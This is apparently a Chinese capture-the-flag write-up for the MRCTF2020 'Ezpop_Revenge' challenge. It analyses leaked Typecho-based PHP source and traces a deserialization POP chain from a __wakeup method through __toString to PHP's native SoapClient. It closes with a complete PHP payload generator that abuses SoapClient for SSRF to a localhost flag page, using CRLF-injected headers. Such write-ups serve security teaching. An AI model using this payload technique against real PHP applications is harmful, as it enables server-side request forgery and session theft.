【MRCTF2020】Ezpop_Revenge——PHP原生类SSRF

【MRCTF2020】Ezpop_Revenge——PHP原生类SSRF

1. 收获

• CMS初审计
• google、baidu hack
• PHP原生类反序列化

2. 看题

2.1 读源码

网页存在源码泄露，访问www.zip，得到源码。同时要知道，typecho模板是存在反序列化注入漏洞的，但是其存在于install.php，本题中没有这个文件，所以找找其他线索。

flag.php:

<?php
if(!isset($_SESSION)) session_start();
if($_SERVER['REMOTE_ADDR']==="127.0.0.1"){
   $_SESSION['flag']= "MRCTF{******}";
}else echo "我扌your problem?\nonly localhost can get flag!";
?>

说明是要读session中的flag字段。

搜索字符串unserialize，找到其他使用反序列化函数的地方，在/usr/plugin.php中发现：

也就是说，如果请求中存在admin字段，同时session中的flag字段也被成功写入，则会输出flag的值。那我们要做的就是满足flag.php中的条件：$_SERVER['REMOTE_ADDR']==="127.0.0.1"。

2.2 函数触发

为了激活该反序列化函数，我们需要查找action函数对应的路由，全局搜索类名HelloWorld_Plugin，定位到文件/var/Typecho/Plugin.php：

可以看到访问/page_admin即可触发action函数。

2.3 POP链

查看/usr/plugin.php中的POP链，定位函数：

class HelloWorld_DB{
    private $flag="MRCTF{this_is_a_fake_flag}";
    private $coincidence;
    function  __wakeup(){
        $db = new Typecho_Db($this->coincidence['hello'], $this->coincidence['world']);
    }
}

这里实例化了一个类，所以进入Typecho_Db类中的__construction查看：

    public function __construct($adapterName, $prefix = 'typecho_')
    {
        /** 获取适配器名称 */
        $this->_adapterName = $adapterName;

        /** 数据库适配器 */
        $adapterName = 'Typecho_Db_Adapter_' . $adapterName;

        if (!call_user_func(array($adapterName, 'isAvailable'))) {
            throw new Typecho_Db_Exception("Adapter {$adapterName} is not available");//__toString()
        }

        $this->_prefix = $prefix;

        /** 初始化内部变量 */
        $this->_pool = array();
        $this->_connectedPool = array();
        $this->_config = array();

        //实例化适配器对象
        $this->_adapter = new $adapterName();
    }

这里提示使用__toString方法。全局搜索toString函数，这里使用/var/Typecho/Db/Query.php中的函数：

public function __toString()
    {
        switch ($this->_sqlPreBuild['action']) {
            case Typecho_Db::SELECT:
                return $this->_adapter->parseSelect($this->_sqlPreBuild);
            case Typecho_Db::INSERT:
           .....//省略后面
        }
    }

可以看到如果我们的_adapter属性不包含parseSelect方法的话就会调用其自身的__call函数，因此这里使用PHP中的原生类SoapClient进行SSRF，因为原生类中包含了__call函数。

利用链：

HelloWorld_DB::wakeup–>Typecho_Db::__construct(tostring)–>Typecho_Db_Query::__construct–>(this->_adapter=new Soapclient)–>SSRF

2.4 Payload

如下：

<?php
class HelloWorld_DB{
    private $coincidence;
    public function __construct()
	{
		$this->coincidence['hello'] = new Typecho_Db_Query();
        $this->coincidence['world'] = 'test';
	}
}

class Typecho_Db_Query{
    private $_sqlPreBuild;
    private $_adapter;
    	private $_prefix;
    public function __construct()
    {
		$target = "http://127.0.0.1/flag.php";
        $headers = array(
            'X-Forwarded-For:127.0.0.1',
            "Cookie: PHPSESSID=qjk6oqprtp6i6rl3tgnk1csev6"
        );
        $this->_adapter = new SoapClient(null, array('uri' => 'test', 'location' => $target, 'user_agent' => "test\r\n" . join("\r\n", $headers)));
        $this->_sqlPreBuild['action'] = "SELECT";
    }

}
$A=new HelloWorld_DB();

echo urlencode(base64_encode(serialize($A)));
?>

下面只需要使用POST方式把上面的输出放到C0incid3nc3变量中即可。然后在GET参数上再加一个admin变量即可出现flag的值。